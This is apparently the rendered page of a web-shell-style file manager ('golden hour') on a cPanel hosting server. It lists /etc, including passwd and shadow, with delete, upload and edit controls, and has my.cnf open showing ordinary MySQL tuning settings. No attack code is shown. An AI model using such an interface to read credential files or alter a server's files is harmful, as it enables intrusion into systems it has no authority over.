golden hour
/etc
⬆️ Go Up
Upload
File/Folder
Size
Actions
.etc.version
5 B
Del
OK
DIR_COLORS
4.56 KB
Del
OK
aliases
1.49 KB
Del
OK
alternatives
-
Del
OK
apache2
-
Del
OK
at.deny
1 B
Del
OK
backupmxhosts
0 B
Del
OK
bash_completion.d
-
Del
OK
bashrc
3.38 KB
Del
OK
cl.nodejs
-
Del
OK
cl.php.d
-
Del
OK
cl.python
-
Del
OK
cl.selector
-
Del
OK
cl.selector.conf.d
-
Del
OK
cpanel
-
Del
OK
crypto-policies
-
Del
OK
default
-
Del
OK
domainusers
3.56 KB
Del
OK
environment
0 B
Del
OK
environment-modules
-
Del
OK
fonts
-
Del
OK
gcrypt
-
Del
OK
group
513 B
Del
OK
host.conf
9 B
Del
OK
hosts
279 B
Del
OK
imunify360
-
Del
OK
inputrc
943 B
Del
OK
ld.so.cache
42.38 KB
Del
OK
ld.so.conf
28 B
Del
OK
ld.so.conf.d
-
Del
OK
localtime
3.47 KB
Del
OK
mail
-
Del
OK
mailcap
272 B
Del
OK
mailhelo
1.96 KB
Del
OK
mailips
1.84 KB
Del
OK
mime.types
65.87 KB
Del
OK
modulefiles
-
Del
OK
motd.d
-
Del
OK
my.cnf
1.75 KB
Del
OK
my.cnf.d
-
Del
OK
nsswitch.conf
2.07 KB
Del
OK
openldap
-
Del
OK
pam.d
-
Del
OK
passwd
1.29 KB
Del
OK
pki
-
Del
OK
profile
2.64 KB
Del
OK
profile.d
-
Del
OK
protocols
6.41 KB
Del
OK
relayhosts
-
Del
OK
resolv.conf
60 B
Del
OK
rpc
1.6 KB
Del
OK
sasl2
-
Del
OK
scl
-
Del
OK
screenrc
6.56 KB
Del
OK
security
-
Del
OK
senderverifybypasshosts
0 B
Del
OK
services
676.03 KB
Del
OK
shadow
855 B
Del
OK
skel
-
Del
OK
skipsmtpcheckhosts
0 B
Del
OK
spammeripblocks
0 B
Del
OK
ssh
-
Del
OK
ssl
-
Del
OK
sysconfig
-
Del
OK
trusted-key.key
375 B
Del
OK
trustedmailhosts
0 B
Del
OK
vimrc
3.92 KB
Del
OK
virc
1.16 KB
Del
OK
wgetrc
4.81 KB
Del
OK
Edit: my.cnf
[mysqld] disable-log-bin=1 default-authentication-plugin=mysql_native_password performance-schema=0 log-error=/var/log/mysqld.log mysqlx=0 innodb_file_per_table=1 # Ensure that each innodb table is it's own binary data block just in case there's corruption. thread_cache_size=4 # can be increased on servers with large numbers of active users key_buffer_size=32M max_allowed_packet=268435456 table_open_cache=512 wait_timeout=300 # can be increased if using persistent connections max_user_connections=25 open_files_limit=40000 myisam_sort_buffer_size=8M # can be increased per sessions if needed for alter tables (indexes, repair) #join_buffer_size=2M # leave at default unless there is a good reason #sort_buffer_size=2M # leave at default unless there is a good reason #read_rnd_buffer_size=256K # leave at default unless there is a good reason #read_buffer_size=2M # leave at default unless there is a good reason collation_server=utf8_unicode_ci character_set_server=utf8 innodb_buffer_pool_size=128M # check mysql -e "SHOW GLOBAL STATUS LIKE 'Innodb_buffer_pool%';" - free vs total innodb_thread_concurrency=8 # Number of physical + virtual CPU's, be careful of adding more tmp_table_size=768M max_heap_table_size=768M max_connections=150 # Should be between 100-150, increase *slowly* because it causes MySQL to consume more memory! table_definition_cache=512 # increase by the same factor as table_open_cache innodb_flush_log_at_trx_commit=2 innodb_log_buffer_size=64M general_log=0 #slow_query_log=0 #log-output=TABLE # select * from mysql.general_log order by event_time desc limit 10; #long_query_time=20 # select * from mysql.slow_log order by start_time desc limit 10; slow_query_log=1 slow_query_log_file=/var/log/mysql-slow.log long_query_time=10 innodb_io_capacity=100
Save